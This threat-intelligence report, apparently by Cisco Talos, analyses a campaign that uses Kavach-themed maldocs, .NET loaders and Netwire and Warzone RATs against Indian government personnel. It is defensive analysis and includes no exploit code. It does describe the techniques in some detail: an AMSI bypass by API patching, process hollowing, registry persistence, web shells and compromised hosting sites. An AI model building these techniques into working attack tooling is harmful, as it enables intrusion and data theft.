- Cisco Talos is tracking a campaign targeting government personnel in India using themes and tactics similar to APT36 (aka Mythic Leopard and Transparent Tribe).
- This campaign distributes malicious documents and archives to deliver the Netwire and Warzone (AveMaria) RATs.
- The lures used in this campaign are predominantly themed around operational documents and guides such as those pertaining to the “Kavach” (hindi for “armor”) two-factor authentication (2FA) application operated by India’s National Informatics Centre (NIC).
- This campaign utilizes compromised websites and fake domains to host malicious payloads, another tactic similar to Transparent Tribe.
Cisco Talos recently discovered a malicious campaign targeting government employees and military personnel in the Indian sub-continent with two commercial and commodity RAT families known as NetwireRAT (aka NetwireRC) and WarzoneRAT (aka Ave Maria). The attackers delivered a variety of lures to their targets, predominantly posing as guides related to Indian governmental infrastructure and operations such as Kavach and I.T.-related guides in the form of malicious Microsoft Office documents (maldocs) and archives (RARs, ZIPs) containing loaders for the RATs.
Apart from artifacts involved in the infection chains, we’ve also discovered the use of server-side scripts to carry out operational tasks such as sending out malicious emails and maintaining presence on compromised sites via web shells. This provides additional insight into the attacker’s operational TTPs.
How did it work?
This campaign uses a few distinct, yet simple, infection chains. Most infections use a maldoc that downloads and instruments a loader. The loader is responsible for downloading or decrypting (if embedded) the final RAT payload and deploying it on the infected endpoint. In some cases, we’ve observed the use of malicious archives containing a combination of maldocs, loaders and decoy images. The RAT payloads are relatively unmodified, with the command and control (C2) IPs and domains being the most pivotal configuration information.
This campaign illustrates another instance of a highly motivated threat actor using a set of commercial and commodity RAT families to infect their victims. These RATs are packed with many features out-of-the-box to achieve comprehensive control over the infected systems. It is also highly likely that these malware families establish footholds into the victim’s networks to deploy additional plugins and modules.
The earliest instance of this campaign was observed in December 2020 utilizing malicious Microsoft Office documents (maldocs). These maldocs contain malicious VBA macros that download and execute the next stage of the infection — the malware loader.
The maldocs’ content ranges from security advisories, to meeting schedules, to software installation notes. These maldocs contain malicious macros that download and execute the next stage payload on the victim’s endpoint. The final payload is usually a RAT that can perform a multitude of malicious operations on the infected endpoint.
The maldocs pose as documents related to either meeting schedules pertinent to the victims, or as technical guides related to the Government of India’s IT infrastructure. It is likely that these files are either delivered as attachments or links in spear-phishing emails where the verbiage is meant to social engineer the victims into opening the maldoc attachments or downloading them from an attacker-controlled link.
Some file names used are:
- Online meeting schedule for OPS.doc
Interestingly, we’ve observed the use of Kavach-themed maldocs and binaries being used in recent SideCopy attacks.
Malicious macro in maldoc downloading and executing the next stage payload.
Stage 2 — Loaders
The payload is usually loader binaries aimed at instrumenting the final malware payload. These loaders will use either of the following techniques to instrument the final malware payloads on the endpoint:
- Download payload from remote location and activate using process hollowing into itself or a target process.
- Decode embedded payload and activate using process hollowing.
Depending on the variants, the loaders may also perform the following peripheral activities:
- Disable AMSI scanning by patching the first six bytes of the “AmsiScanBuffer” API.
- Set up persistence via registry for the next stage malware payload dropped to disk using the HKCU\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run keys.
Throughout March and April 2021, the attackers utilized downloaders to download and execute the RAT payloads from remote locations. The earliest versions of this loader used RunPE DLLs to inject the malware payloads into a specified target process via hollowing.
.NET loader utilizing RunPE.dll to inject AveMaria RAT payload into InstallUtil.exe.
In May 2021, the attackers used the next iteration of their C#-based downloader that reaches out to a decoy URL and only proceeds with execution if the communication process fails.
Downloader reaching out to a decoy URL and executing actual functionality in the catch code block.
This downloader then proceeds to patch the “AmsiScanBuffer” API, establishes persistence for the next stage payload and invokes it at the end. The payload in the next stage consists of legitimate .NET-based applications trojanized with the ability to decrypt and deploy the NetwireRAT malware.
AMSI bypass, persistence and invocation by the loader.
Toward the beginning of June 2021, the attackers started experimenting with the use of Pastebin as a payload-hosting platform. The downloader reached out to a Pastebin URL via cURL to download and inject the payload into its own running process.
Evolution of the downloaders:
Loaders with embedded payloads
The attackers modified open-source projects with code to load trojanized .NET-based binaries as loaders for the RATs dating as far back as December 2020. One of the droppers we analyzed is based on the Pangantucan Community High School library management system application.
It is likely that the loader is based on a crypter available to the attackers since we’ve observed other crimeware families such as Formbook use similar loaders to infect their targets.
The original application Initialization code for Form1.
The same function in the trojanized version calls a constructor to the added ISectionEntry class.
The loader modified the Login form with a call to a function that loads a DLL loader with the assembly name “SimpleUI.” The second-stage loader is extracted from the .NET resource with the name “Draw.”
The assembly extracted from the Draw resource is responsible for decoding and loading a Netwire injector module which is stored as the AuthorizationRule bitmap resource in the original trojanized loader.
AutorizationRule blob parsed as a bitmap image (464,147 bytes long).
The injector is responsible for deploying the netwireRAT binary present in its .NET resources into a target process, such as vbc.exe.
Stage 3 — Final payloads
The Netwire and AveMaria RAT families are eventually downloaded and executed on the victim machine. In some cases, we’ve also discovered the deployment of custom .NET-based file enumerator modules that generate and exfiltrate file path listings of specific file extensions on the infected systems.
Maldoc infection chain variation
In one instance, the attackers used a different variation of the infection chain that starts with a malicious document delivered to the victim. The macro in the maldoc downloads and executes a VBScript (VBS) instead of directly downloading the malware payload.
The VBS contains many junk comments interlaced with the actual malicious code. The malicious code will execute an encoded PowerShell command to download the next payload.
The PowerShell downloads a malicious archive and an unzip utility such as 7-Zip from a remote location. This utility unzips and runs the malware payload from the archive file. An example of the command used to unzip the archive is:
7za.exe x -y -aoa -bso0 -bse0 -bb0 -bd <archive_file_path>
Decoded PowerShell commands to activate the next-stage payload.
Infection chain diagram:
The final payload in this infection chain is a loader for AveMariaRAT.
In other infection attempts dating as far back as December 2020, the attackers hosted malicious ZIP archives containing malware payloads on compromised websites. It is likely that the URLs to these archive files were sent to victims to make them download and open the malware payload on their endpoints.
Three distinct archives containing the malicious payloads.
The malicious binaries from the archives found thus far load and instrument NetwireRAT.
Netwire is a highly versatile RAT consisting of multiple capabilities including:
- Stealing credentials from browsers.
- Execute arbitrary commands.
- Gather system information.
- File management operations such as write, read, copy, delete files, etc.
- Enumerate, terminate processes.
Ave MariaRAT, also known as WarzoneRAT, is a commercial RAT available for purchase to malicious operators although there are cracked versions of Warzone available online.
WarzoneRAT capabilities (snip) as advertised by its authors.
Like Netwire, WarzoneRAT is also packed with a variety of functionalities including:
- Remote desktop.
- Webcam capture.
- Credential stealing from browsers and email clients.
- File management operations such as write, read, copy, delete files etc.
- Execute arbitrary commands.
- Reverse shells.
- Enumerate, terminate processes.
Reverse shell functionality in WarzoneRAT.
Apart from the two RATs, we’ve also observed specialized reconnaissance malware being deployed on the victim’s endpoints instead of a RAT family. The attackers deployed a preliminary recon tool to enumerate specific folders looking for certain file extensions. The file listings/paths found are uploaded to an attacker-controlled C2 server.
The locations targeted were:
The file extensions searched for were:
.txt, .doc, .dot, .wbk, .docx, .docm, .dotx, .dotm, .docb, .xls, .xlt, .xlm, .xlsx, .xlsm, .xltx, .xltm, .xlsb, .xla, .xlam, .xll, .xlw, .ppt, .pot, .pps, .pptx, .pptm, .potx, .potm, .ppam, .ppsx, .ppsm, .sldx, .sldm, .pdf
File enumerator malware module looking for specific file extensions.
Analyses and observations
An extremely common theme of maldocs and archives discovered in this campaign refers to the Government of India’s Kavach application. This is a two-factor authentication (2FA) application used by government employees to access their emails. This theme has been used recently by the SideCopy APT’s campaigns targeting Indian government personnel, as well. Some of the malicious artifacts using the Kavach theme in the current campaign are named:
Other file names indicating targeting of military and government personnel consist of:
- Pay and Allowance Details.xls
The attackers have relied on a combination of compromised websites and fake domains to carry out their operations — a tactic similar to that of the Transparent Tribe APT group. However, what stands out in this campaign is the focus on compromising quasi-military or government-related websites to host malicious payloads. This might have been done to appear legitimate to victims and analysts.
For example, the attackers compromised and maintained access to a quasi-defense-related website dsoipalamvihar[.]co[.]in belonging to the Defence Services Officers’ Institute (DSOI) using it to host netwireRAT-related payloads since January 2021. In another instance, the attackers compromised the website for the Army Public Schools of India (apsdigicamp[.]com) to host a variety of malicious archives serving NetwireRAT again.
On the other hand, the attackers used a fake domain govrn[.]xyz in July 2021 to host maldocs for their infection chains.
Malicious scripts and payloads hosted on a compromised website.
The compromised websites were used heavily to host artifacts from maldocs to RATs. However, these websites hosted a few other malicious artifacts as well. The artifacts scripts were used as:
- Web shells.
- CSRF PoC generator.
- File uploaders.
None of these scripts have been written from scratch or customized heavily by the attackers. This practise is in sync with their RAT deployments — neither the RAT payloads nor the infrastructure scripts have been modified except their configurations. The actual effort instead is put into social engineering and infecting victims.
Proliferation through emails
A variety of mailers have been used by the attackers to proliferate the maldocs, archives and download links:
- TeamCC ninjaMailer v220.127.116.11
- Leaf PHPMailer 2.7
- Leaf PHPMailer 2.8
These PHP-based scripts are capable of configuring SMTP options and generating spear-phishing emails that can be distributed to victims with malicious payloads or links.
TeamCC NinjaMailer hosted by the attackers on one of the compromised sites.
The attackers utilized two types of management scripts to administer the compromised websites. PHP and Perl-based web shells maintain browser-based access to the sites and perform administrative actions such as file management, process management and viewing file contents. The web shells used are:
- b374k 2.7
- Older b374k web shell
b374k web shell’s login page on the compromised site.
Older Perl-based b374k web shell hosted on a compromised site.
The attackers also deployed a file uploader utility (created by “Pakistan Haxors Crew”) to upload files to the sites without having to go through the web shells.
This campaign has been ongoing since the end of 2020 and continues to operate today. The attackers initially deployed Netwire and Warzone RATs on the infected endpoints. The use of these RATs benefits an adversary twofold — it makes attribution difficult and saves the effort to create bespoke implants. Beginning in July 2021, however, we observed the deployment of the file enumerators alongside the RATs. This indicates that the attackers are expanding their malware arsenal to target their victims: military and government personnel in India.
Infection tactics including government-themed lures, deployment of commodity/commercial RATs and file enumerators and the use of compromised and attacker-owned domains indicates a strong resemblance to SideCopy and Transparent Tribe.
Unlike many crimeware and APT attacks, this campaign uses relatively simple, straightforward infection chains. The attackers have not developed bespoke malware or infrastructure management scripts to carry out their attacks, but the use of prebaked artifacts doesn’t diminish the lethality of these attacks. In fact, ready-made artifacts such as commodity or cracked RATs and mailers allow the attackers to rapidly operationalize new campaigns while focusing on their key tactic: tricking victims into infecting themselves.
Ways our customers can detect and block this threat are listed below.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.
Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click below:
RunPE loader DLL
C# based netwire loaders
Malicious server side scripts
Maldoc download locations
Loader/RAT download locations
File Enumerator C2s
Malicious archive download locations
RunPe download URLs
Malicious server-side script URLs